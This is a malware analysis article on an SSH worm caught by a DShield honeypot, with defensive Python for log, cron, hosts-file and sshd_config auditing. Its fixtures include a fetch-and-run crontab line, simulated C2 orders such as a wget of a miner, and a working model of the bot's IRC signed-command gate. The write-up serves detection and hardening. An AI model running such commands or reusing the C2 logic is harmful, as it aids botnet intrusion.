Weak SSH passwords remain one of the most reliable entry points on the internet, and botnet operators exploit them to turn a Linux system into a full compromise within seconds. During a recent internship project on a DShield sensor, a self-spreading SSH worm was captured in action: it combines credential brute-forcing, multi-stage malware execution, persistent backdoors, IRC-based command and control, RSA-signed command verification, and automated lateral movement with Zmap and sshpass.

The whole attack took only seconds. At 08:24:13 the attacker connected from 83.135.10.12, an address attributed to Versatel Deutschland in Germany. One second later the brute force succeeded with the credentials "pi / raspberryraspberry993311", and by 08:24:15 a 4.7 KB malicious bash script had been uploaded over SCP.
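How a login like this shows up in sshd's auth log, and how to flag it, as an added example (not part of the SANS analysis): the detector looks for password logins preceded by failures from the same source within a short window, or to a well-known default account, and records how long the resulting session lasted. The log lines are constructed to match the capture's timeline; the single failed first attempt, the pids, ports and the benign entries are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd lines in auth.log syslog format. Timestamps, account and
# source IP follow the capture's timeline; the failed attempt, pids, ports and
# the benign admin/root lines are assumptions for the example.
SAMPLE_AUTH_LOG = """\
Oct 12 08:24:13 sensor sshd[4181]: Failed password for pi from 83.135.10.12 port 50122 ssh2
Oct 12 08:24:14 sensor sshd[4181]: Accepted password for pi from 83.135.10.12 port 50122 ssh2
Oct 12 08:24:14 sensor sshd[4181]: pam_unix(sshd:session): session opened for user pi(uid=1000) by (uid=0)
Oct 12 08:24:17 sensor sshd[4181]: pam_unix(sshd:session): session closed for user pi
Oct 12 09:10:02 sensor sshd[5020]: Accepted publickey for admin from 10.0.0.5 port 41000 ssh2: ED25519 SHA256:k3y
Oct 12 09:30:45 sensor sshd[5311]: Failed password for root from 198.51.100.7 port 3300 ssh2
Oct 12 09:30:47 sensor sshd[5311]: Failed password for root from 198.51.100.7 port 3300 ssh2
"""

AUTH_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[(?P<pid>\d+)\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\S+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)
SESSION_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[(?P<pid>\d+)\]: "
    r"pam_unix\(sshd:session\): session (?P<state>opened|closed) for user (?P<user>[^\s(]+)"
)


def parse_ts(text):
    # auth.log carries no year; the deltas below do not need one
    return datetime.strptime(text, "%b %d %H:%M:%S")


def find_fast_brute_force(log_text, window_s=60, default_users=("pi", "root", "admin")):
    """Flag password logins that follow failures from the same IP, or that use a
    default account, and attach how long the resulting session lasted."""
    failures = defaultdict(list)   # ip -> timestamps of failed attempts
    closed_at = {}                 # sshd pid -> session close time
    for line in log_text.splitlines():
        m = SESSION_RE.match(line)
        if m and m["state"] == "closed":
            closed_at[m["pid"]] = parse_ts(m["ts"])
    findings = []
    for line in log_text.splitlines():
        m = AUTH_RE.match(line)
        if not m:
            continue
        ts = parse_ts(m["ts"])
        if m["result"] == "Failed":
            failures[m["ip"]].append(ts)
            continue
        if m["method"] != "password":      # key logins cannot be brute-forced this way
            continue
        recent = [t for t in failures[m["ip"]] if 0 <= (ts - t).total_seconds() <= window_s]
        reasons = []
        if recent:
            reasons.append(f"{len(recent)} failed password(s) from {m['ip']} in the prior {window_s}s")
        if m["user"] in default_users:
            reasons.append(f"password login to default account '{m['user']}'")
        if not reasons:
            continue
        end = closed_at.get(m["pid"])
        findings.append({
            "ip": m["ip"],
            "user": m["user"],
            "accepted_at": m["ts"],
            "seconds_from_first_failure": (ts - recent[0]).total_seconds() if recent else None,
            "session_seconds": (end - ts).total_seconds() if end else None,
            "reasons": reasons,
        })
    return findings


if __name__ == "__main__":
    for hit in find_fast_brute_force(SAMPLE_AUTH_LOG):
        print(hit)
```

On the constructed data this returns one finding for 83.135.10.12: a failure, success one second later, and a three-second session, which is the signature of a scripted upload-and-run rather than an interactive login. The root failures without a success stay in the failure list and would be fail2ban's job.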

Execution followed at 08:24:16: the script locked in persistence and started C2 check-ins and scanning, and the attacker disconnected at 08:24:17. The SSH client banner SSH-2.0-OpenSSH_8.4p1 Raspbian-5+b1, together with the HASSH fingerprint ae8bd7dd09970555aa4c6ed22adbbf56, points to a compromised Raspberry Pi as the launch point.

Post-Compromise Execution and Persistence

Once authenticated, the script ran through a full botnet lifecycle.

First it established persistence by adding itself to system startup files and installing cron jobs so that it survives a reboot.

(Figure: diagram of the observed attack's network. Source: SANS)

To clear the field, the malware then killed competing processes such as cryptominers and rival bots. It also rewrote the hosts file so that a known C2 hostname resolves to the loopback address, which sinkholes that name on the infected host.
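Two quick triage checks for the persistence and hosts-file changes described above, as an added example (my code, not the worm's script): one flags crontab entries that look like malware persistence, the other lists hostnames mapped to a loopback address that are not the standard local names. The crontab and hosts entries are constructed, since the page does not give the real paths or the sinkholed hostname.

```python
import ipaddress
import re

# Constructed artefacts from a hypothetical infected Pi (not the capture's real paths):
CRONTAB_TEXT = """\
# m h  dom mon dow   command
0 3 * * * /usr/bin/certbot renew --quiet
@reboot /home/pi/.cache/.x/start.sh >/dev/null 2>&1
*/10 * * * * curl -s http://198.51.100.23/u.sh | sh
"""

HOSTS_TEXT = """\
127.0.0.1       localhost
127.0.1.1       raspberrypi
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
127.0.0.1       c2.rival-botnet.example   # appended by the malware (constructed)
"""

LOCAL_NAMES = {"localhost", "localhost.localdomain", "ip6-localhost", "ip6-loopback"}
FETCH_AND_RUN = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
HIDDEN_DIR = re.compile(r"/\.[^/\s]+/")


def suspicious_cron_entries(crontab: str) -> list:
    """Return (entry, reasons) for lines that match common malware persistence patterns."""
    findings = []
    for raw in crontab.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        reasons = []
        if line.startswith("@reboot"):
            reasons.append("runs at every boot")
        if FETCH_AND_RUN.search(line):
            reasons.append("pipes a download into a shell")
        if HIDDEN_DIR.search(line):
            reasons.append("command path is in a hidden directory")
        if reasons:
            findings.append((line, reasons))
    return findings


def sinkholed_hosts(hosts: str, own_hostname: str) -> list:
    """Names that resolve to a loopback address but are neither the standard
    local names nor the machine's own hostname (Debian maps that to 127.0.1.1)."""
    flagged = []
    for raw in hosts.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        addr, *names = line.split()
        try:
            if not ipaddress.ip_address(addr).is_loopback:
                continue
        except ValueError:          # malformed address: not our concern here
            continue
        for name in names:
            if name not in LOCAL_NAMES and name != own_hostname:
                flagged.append((name, addr))
    return flagged


if __name__ == "__main__":
    for entry, why in suspicious_cron_entries(CRONTAB_TEXT):
        print(entry, "->", ", ".join(why))
    for name, addr in sinkholed_hosts(HOSTS_TEXT, "raspberrypi"):
        print("sinkholed:", name, "->", addr)
```

On a live host, feed it `crontab -l -u <user>` for every account plus /etc/cron.d/*, and /etc/hosts; a name that resolves to loopback but is not local is worth checking against threat intelligence, because a bot that sinkholes a hostname is usually blocking a competitor's C2 rather than its own.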

Next it loads an embedded RSA public key and uses it to verify the signature on every incoming C2 command, so that only someone holding the matching private key can issue orders and a hijacked channel cannot be used to retask the bot. The script then connected to six IRC networks and joined the channel #biret. Enrollment completed over the TCP connection: the bot registered a nickname with the C2, which then monitored its liveness with IRC PING/PONG exchanges.
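The IRC enrollment and the signed-command gate, modelled as an added example (my code, not the worm's script, whose real key, nickname scheme and command syntax are not on the page): the bot registers, joins #biret once the server's welcome arrives, answers PING with PONG, and executes a channel command only if an RSA signature over it verifies against the embedded public key. The key pair uses small, well-known primes and textbook RSA without padding so that it runs offline; the "!run <hex-signature> <command>" format, the nickname and the server name are assumptions.

```python
import hashlib
import re

# Toy RSA key pair (assumption: two well-known primes so the example runs offline
# without a crypto library). Textbook RSA with no padding: illustration only.
# A real bot embeds a full-size public key; only the operator holds PRIVATE_D.
P, Q = 104729, 1299709
N = P * Q
E = 65537
PRIVATE_D = pow(E, -1, (P - 1) * (Q - 1))


def digest_mod_n(command: str) -> int:
    """SHA-256 of the command text, reduced into the modulus range."""
    return int.from_bytes(hashlib.sha256(command.encode()).digest(), "big") % N


def operator_sign(command: str) -> int:
    """Operator side: sign a command with the private exponent."""
    return pow(digest_mod_n(command), PRIVATE_D, N)


def bot_verify(command: str, signature: int) -> bool:
    """Bot side: check the signature using only the embedded public key (N, E)."""
    return pow(signature, E, N) == digest_mod_n(command)


IRC_LINE = re.compile(r"^(?::(?P<prefix>\S+) )?(?P<cmd>\S+)(?: (?P<params>.*))?$")


class Bot:
    """Minimal model of the bot's IRC state machine."""

    def __init__(self, nick: str, channel: str):
        self.nick, self.channel = nick, channel
        self.sent = []        # lines the bot writes to the server
        self.executed = []    # commands that passed signature verification
        self.rejected = []    # commands that failed it

    def connect(self):
        # Enrollment: right after the TCP connection the bot registers its nickname.
        self.sent += [f"NICK {self.nick}", f"USER {self.nick} 0 * :{self.nick}"]

    def handle(self, line: str):
        m = IRC_LINE.match(line.strip())
        if not m:
            return
        cmd, params = m.group("cmd"), m.group("params") or ""
        if cmd == "PING":                      # liveness check from the server
            self.sent.append(f"PONG {params}")
        elif cmd == "001":                     # welcome numeric: registration done
            self.sent.append(f"JOIN {self.channel}")
        elif cmd == "PRIVMSG":
            target, _, text = params.partition(" :")
            if target != self.channel:         # only the control channel is honoured
                return
            parts = text.split(" ", 2)         # "!run <hex-signature> <command>" (assumed format)
            if len(parts) == 3 and parts[0] == "!run":
                try:
                    sig = int(parts[1], 16)
                except ValueError:
                    sig = -1
                (self.executed if bot_verify(parts[2], sig) else self.rejected).append(parts[2])


def simulate() -> Bot:
    """Constructed session: one genuine order, one replayed signature on altered text,
    one forgery from someone without the private key, one message off-channel."""
    bot = Bot("pi-4f2a", "#biret")
    bot.connect()
    good = "uname -a"
    sig = operator_sign(good)
    for line in [
        ":irc.example.net 001 pi-4f2a :Welcome",
        "PING :irc.example.net",
        f":oper!o@c2 PRIVMSG #biret :!run {sig:x} {good}",
        f":oper!o@c2 PRIVMSG #biret :!run {sig:x} cat /etc/passwd",
        ":rival!r@x PRIVMSG #biret :!run deadbeef wget http://rival.example/miner",
        f":rival!r@x PRIVMSG pi-4f2a :!run {sig:x} {good}",
    ]:
        bot.handle(line)
    return bot


if __name__ == "__main__":
    b = simulate()
    print("sent:", b.sent, "\nexecuted:", b.executed, "\nrejected:", b.rejected)
```

The point of the gate is visible in the rejected list: neither a rival who has taken over the channel nor a replay of a genuine signature on different text gets anything executed, which is why operators bother embedding a key. Defensively, the same model suggests what to look for on the wire: an outbound connection that sends NICK/USER, joins a channel, and then answers server PINGs from a host that has no business speaking IRC.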

If the C2 sent a PING, the bot answered with a PONG to show it was still alive.

Lateral Propagation and Defensive Guidance

With C2 established, the worm installed Zmap and sshpass in order to spread. It scanned 100,000 random IP addresses for an open SSH port 22.

(Figure: credential-stuffing SSH worm found. Source: SANS)

Each hit triggered credential tests: "pi / raspberry" first, then "pi / raspberryraspberry993311".

A success restarted the entire infection chain on the new host, which let the worm spread quickly and quietly.

No cryptominer was dropped in this capture, but the script's logic for killing rival miners suggests one would be a natural follow-on payload. The chain matters because it exposes fundamental defects: default credentials on internet-facing devices, with neither key-based authentication nor brute-force blocking, invite immediate compromise.

IoT devices such as Raspberry Pis are frequently exposed online with factory settings intact, which makes them prime botnet fodder. The whole sequence, from first connection to the start of scanning, took under four seconds, a demonstration of how fast a worm moves. SANS notes that defenders can counter this. Switch SSH to key-only authentication and disable passwords entirely.

On Raspberry Pis, remove the default "pi" user. Deploy fail2ban to block repeated brute-force attempts. Segment IoT networks to limit the blast radius. Measures like these turn soft targets into hard ones.
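The configuration side of that advice, as an added example (not from the page or SANS): a small auditor that reads an sshd_config the way sshd does (the first occurrence of a directive wins) and reports the settings that leave a box open to this worm, run against a constructed weak config and a constructed hardened one. The default values assumed are OpenSSH 8.x's; DenyUsers pi is a stopgap for hosts where the account cannot be deleted yet, and the page's advice to remove it stands.

```python
import re

# Constructed sshd_config fragments: a default-ish hobbyist setup and the
# key-only configuration the page recommends.
WEAK_SSHD_CONFIG = """\
Port 22
PermitRootLogin yes
PasswordAuthentication yes
ChallengeResponseAuthentication no
UsePAM yes
"""

HARDENED_SSHD_CONFIG = """\
Port 22
PermitRootLogin no
PasswordAuthentication no
KbdInteractiveAuthentication no
PubkeyAuthentication yes
AuthenticationMethods publickey
MaxAuthTries 3
LoginGraceTime 20
DenyUsers pi
"""

# What sshd assumes when a directive is absent (assumption: OpenSSH 8.x defaults).
DEFAULTS = {
    "passwordauthentication": "yes",
    "kbdinteractiveauthentication": "yes",
    "permitrootlogin": "prohibit-password",
    "maxauthtries": "6",
}


def parse_sshd_config(text: str) -> dict:
    """Keyword -> value, lower-cased; first occurrence wins, as in sshd.
    Stops at the first Match block, whose directives are conditional."""
    directives = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)   # sshd accepts "Key value" and "Key=value"
        key = parts[0].lower()
        if key == "match":
            break
        directives.setdefault(key, parts[1].strip().lower() if len(parts) > 1 else "")
    return directives


def audit_sshd_config(text: str, default_accounts=("pi",)) -> list:
    """Return human-readable findings; an empty list means the checks all pass."""
    d = parse_sshd_config(text)
    setting = lambda k: d.get(k, DEFAULTS[k])
    # ChallengeResponseAuthentication is the pre-8.7 spelling of KbdInteractiveAuthentication
    kbd = d.get("kbdinteractiveauthentication",
                d.get("challengeresponseauthentication", DEFAULTS["kbdinteractiveauthentication"]))
    findings = []
    if setting("passwordauthentication") != "no":
        findings.append("PasswordAuthentication is not 'no': password guessing is possible")
    if kbd != "no":
        findings.append("KbdInteractiveAuthentication is not 'no': PAM can still prompt for a password")
    if setting("permitrootlogin") == "yes":
        findings.append("PermitRootLogin yes: root accepts password logins")
    if int(setting("maxauthtries")) > 3:
        findings.append(f"MaxAuthTries {setting('maxauthtries')}: generous guess budget per connection")
    denied = d.get("denyusers", "").split()
    for acct in default_accounts:
        if acct not in denied:
            findings.append(f"default account '{acct}' is not denied: delete it, or DenyUsers {acct} as a stopgap")
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_SSHD_CONFIG), ("hardened", HARDENED_SSHD_CONFIG)):
        print(label, "->", audit_sshd_config(cfg) or "no findings")
```

On a live host, feed it the output of `sshd -T` rather than the file: that is the effective configuration after includes and Match blocks are resolved. MaxAuthTries only limits guesses per connection; the per-source rate limit across connections is what fail2ban adds.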

As this DShield catch shows, even a hobbyist Linux box becomes a botnet zombie when those basics are missing; hardening starts with them, not with exotic setups.

Key IOCs

Indicator type      Value
IP                  83.135.10.12
SSH HASSH           ae8bd7dd09970555aa4c6ed22adbbf56
Credentials         pi / raspberryraspberry993311
IRC channel         #biret
Malware size        4.7 KB bash script